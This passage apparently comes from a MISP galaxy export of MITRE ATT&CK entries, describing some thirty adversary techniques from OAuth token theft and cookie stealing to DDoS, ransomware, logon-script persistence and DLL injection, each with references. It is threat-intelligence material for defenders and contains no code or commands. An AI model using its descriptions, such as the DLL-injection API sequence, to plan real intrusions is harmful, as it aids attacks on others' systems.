Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528"

Table 3311. Table References
Links
https://attack.mitre.org/techniques/T1528
https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow
https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app
https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/
https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

Gather Victim Host Information - T1592

Adversaries may gather information about the victim’s hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592"

Table 3312. Table References
Links
https://attack.mitre.org/techniques/T1592
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://threatconnect.com/blog/infrastructure-research-hunting/

Identify people of interest - T1269

The attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify people of interest - T1269"

Table 3313. Table References
Links
https://attack.mitre.org/techniques/T1269

Data from Local System - T1533

Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system.

Local system data includes information stored by the operating system. Access to local system data often requires escalated privileges (e.g. root access). Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"

Table 3314. Table References
Links
https://attack.mitre.org/techniques/T1533

Post compromise tool development - T1353

After compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)

The tag is: misp-galaxy:mitre-attack-pattern="Post compromise tool development - T1353"

Table 3315. Table References
Links
https://attack.mitre.org/techniques/T1353

Standard Application Layer Protocol - T1437

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.

In the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. Google reportedly responds to reports of abuse by blocking access to GCM.(Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437"

Table 3316. Table References
Links
https://attack.mitre.org/techniques/T1437
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html
https://securelist.com/mobile-malware-evolution-2013/58335/

Build or acquire exploits - T1349

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)

The tag is: misp-galaxy:mitre-attack-pattern="Build or acquire exploits - T1349"

Table 3317. Table References
Links
https://attack.mitre.org/techniques/T1349
https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

Create infected removable media - T1355

Use of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Create infected removable media - T1355"

Table 3318. Table References
Links
https://attack.mitre.org/techniques/T1355

Remote Service Session Hijacking - T1563

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563"

Table 3319. Table References
Links
https://attack.mitre.org/techniques/T1563
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

Steal Web Session Cookie - T1539

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539"

Table 3320. Table References
Links
https://attack.mitre.org/techniques/T1539
https://wunderwuzzi23.github.io/blog/passthecookie.html
https://securelist.com/project-tajmahal/90240/
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
https://github.com/kgretzky/evilginx2
https://github.com/muraenateam/muraena

Targeted social media phishing - T1366

This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).

Sending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted social media phishing - T1366"

Table 3321. Table References
Links
https://attack.mitre.org/techniques/T1366

Modify Trusted Execution Environment - T1399

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device’s Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Trusted Execution Environment - T1399"

Table 3322. Table References
Links
https://attack.mitre.org/techniques/T1399
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html
https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf
https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Masquerade as Legitimate Application - T1444

An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.

Embedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.

Pretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)

Malicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"

Table 3323. Table References
Links
https://attack.mitre.org/techniques/T1444
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html
http://ieeexplore.ieee.org/document/6234407
https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Compromise Client Software Binary - T1554

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"

Table 3324. Table References
Links
https://attack.mitre.org/techniques/T1554

Abuse Elevation Control Mechanism - T1548

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548"

Table 3325. Table References
Links
https://attack.mitre.org/techniques/T1548

Downgrade to Insecure Protocols - T1466

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466"

Table 3326. Table References
Links
https://attack.mitre.org/techniques/T1466
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html
http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf

Rogue Cellular Base Station - T1467

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467"

Table 3327. Table References
Links
https://attack.mitre.org/techniques/T1467
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html
http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html

Data Encrypted for Impact - T1486

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"

Table 3328. Table References
Links
https://attack.mitre.org/techniques/T1486
https://www.us-cert.gov/ncas/alerts/TA16-091A
https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
https://www.us-cert.gov/ncas/alerts/TA17-181A
https://www.us-cert.gov/ncas/alerts/AA18-337A
https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

Exploit via Radio Interfaces - T1477

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

Baseband Vulnerability Exploitation

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).

Malicious SMS Message

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477"

Table 3329. Table References
Links
https://attack.mitre.org/techniques/T1477
https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html
http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/
https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf
http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html
https://srlabs.de/bites/rooting-sim-cards/

Network Denial of Service - T1498

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).

The tag is: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"

Table 3330. Table References
Links
https://attack.mitre.org/techniques/T1498
https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Endpoint Denial of Service - T1499

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499"

Table 3331. Table References
Links
https://attack.mitre.org/techniques/T1499
https://capec.mitre.org/data/definitions/227.html
https://capec.mitre.org/data/definitions/131.html
https://capec.mitre.org/data/definitions/130.html
https://capec.mitre.org/data/definitions/125.html
https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Credentials from Password Stores - T1555

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"

Table 3332. Table References
Links
https://attack.mitre.org/techniques/T1555

Exfiltration Over Web Service - T1567

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567"

Table 3333. Table References
Links
https://attack.mitre.org/techniques/T1567

Search Open Technical Databases - T1596

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Technical Databases - T1596"

Table 3334. Table References
Links
https://attack.mitre.org/techniques/T1596
https://www.whois.net/
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/
https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
https://www.sslshopper.com/ssl-checker.html
https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/
https://shodan.io

Modify Cloud Compute Infrastructure - T1578

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578"

Table 3335. Table References
Links
https://attack.mitre.org/techniques/T1578
https://content.fireeye.com/m-trends/rpt-m-trends-2020

Gather Victim Identity Information - T1589

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589"

Table 3336. Table References
Links
https://attack.mitre.org/techniques/T1589
https://www.opm.gov/cybersecurity/cybersecurity-incidents/
https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
https://github.com/dxa4481/truffleHog
https://github.com/michenriksen/gitrob
https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

SNMP (MIB Dump) - T1602.001

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001"

Table 3337. Table References
Links
https://attack.mitre.org/techniques/T1602/001
https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
https://www.us-cert.gov/ncas/alerts/TA18-106A
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

Logon Script (Windows) - T1037.001

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)

The tag is: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001"

Table 3338. Table References
Links
https://attack.mitre.org/techniques/T1037/001
https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx
http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

Logon Script (Mac) - T1037.002

Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)

Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Logon Script (Mac) - T1037.002"

Table 3339. Table References
Links
https://attack.mitre.org/techniques/T1037/002
https://support.apple.com/de-at/HT2420
https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Push-notification client-side exploit - T1373

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)

The tag is: misp-galaxy:mitre-attack-pattern="Push-notification client-side exploit - T1373"

Table 3340. Table References
Links
https://attack.mitre.org/techniques/T1373

Dynamic-link Library Injection - T1055.001

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"

Table 3341. Table References
Links
https://attack.mitre.org/techniques/T1055/001
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.endgame.com/blog/technical-blog/hunting-memory

Exploit Public-Facing Application - T1190

